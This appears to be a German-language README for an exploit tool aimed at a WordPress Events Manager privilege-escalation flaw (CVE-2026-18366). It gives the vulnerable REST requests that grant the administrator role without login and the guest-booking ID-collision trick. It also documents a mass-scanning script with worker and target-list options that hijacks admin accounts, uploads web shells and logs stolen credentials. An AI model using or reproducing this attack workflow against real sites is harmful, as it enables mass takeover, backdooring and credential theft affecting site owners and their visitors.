
Events Manager < 7.4.1 - Nicht authentifizierte Privilegieneskalation zum Administrator
Events Manager < 7.4.1 - Nicht authentifizierte Privilegieneskalation zum Administrator
| Attribut | Details |
|---|---|
| CVE-ID | CVE-2026-18366 |
| Schweregrad | 🔴 KRITISCH (CVSS 9.8) |
| Plugin | Events Manager für WordPress |
| Betroffene Versionen | < 7.4.1 |
| Schwachstellentyp | Nicht authentifizierte Privilegieneskalation |
| Angriffsvektor | Netzwerk |
| Erforderliche Authentifizierung | Keine |
Die Schwachstelle befindet sich in EM\Archetypes::map_meta_cap innerhalb von classes/em-archetypes.php. Das Plugin schränkt sein Capability-Mapping fehlerhaft ein, indem es:
$caps = [] leert, falls der Post ein event- oder location-CPT istedit_user, delete_user oder promote_user nie wieder auffüllthas_cap() gibt true zurück, auch für Benutzer 0 (Gast)POST|PUT|PATCH /wp-json/wp/v2/users/{id}
POST /index.php?rest_route=/wp/v2/users/{id}
Body: {"password":"...","roles":["administrator"]}
Bedingung: {id} muss der wp_posts.ID eines event- oder location-CPT entsprechen.
⚠️ Nicht authentifiziertes REST erfordert kein Nonce (kein eingeloggtes Cookie).
Gastbuchungen (dbem_bookings_anonymous=1 standardmäßig) erstellen echte WP-Benutzer, was das Erzwingen von ID-Kollisionen ermöglicht. Das Buchungs-Nonce ist öffentlich auf Event-Formularen verfügbar.
pip install aiohttp
python CVE-2026-18366.py
Das Skript fragt Folgendes ab:
list.txt)python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
| Option | Beschreibung |
|---|---|
-l, --list | Pfad zur Datei, die die Ziel-URLs enthält |
-s, --speed | Anzahl gleichzeitiger Worker (1-200) |
--timeout | Request-Timeout in Sekunden (Standard: 20) |
Erstellen Sie eine Datei list.txt mit einem Ziel pro Zeile:
https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com
[+] [HH:MM:SS] target.com ADMIN username:password uid=X path
[+] [HH:MM:SS] target.com SHELL https://target.com/wp-content/plugins/...
Erfolgreiche Kompromittierungen werden in adminS.txt gespeichert:
https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url
┌─────────────────────────────────────────────────────────────────┐
│ CVE-2026-18366 Flow │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────┐ ┌─────────────┐ ┌──────────────────────┐ │
│ │ Detect │ → │ Collect IDs │ → │ PATH A: ID Brute │ │
│ │ Plugin │ │ (CPT/HTML) │ │ REST /users/{id} │ │
│ └──────────┘ └─────────────┘ └──────────┬───────────┘ │
│ │ │
│ ┌──────▼──────┐ │
│ │ Success? │ │
│ └──────┬──────┘ │
│ No │ │ Yes │
│ ┌──────────▼──────▼──────────┐ │
│ │ │ │
│ ┌──────────────────────┐ │ ┌─────────────────┐ │ │
│ │ PATH B: Guest Book │ ←───┘ │ Login + Verify │ │ │
│ │ Create user until │ │ Admin Access │ │ │
│ │ user_id == post_id │ └────────┬────────┘ │ │
│ └──────────────────────┘ │ │ │
│ ┌────────▼────────┐ │ │
│ │ Upload Shell │ │ │
│ │ (Plugin/Theme) │ │ │
│ └────────┬────────┘ │ │
│ │ │ │
│ ┌────────▼────────┐ │ │
│ │ Save Results │ │ │
│ │ adminS.txt │ │ │
│ └─────────────────┘ │ │
│ │ │
└────────────────────────────────────────────────────────────────┘
├── CVE-2026-18366.py # Main exploit script
├── list.txt # Target URLs (create this)
├── adminS.txt # Successful results (auto-created)
└── README.md # This documentation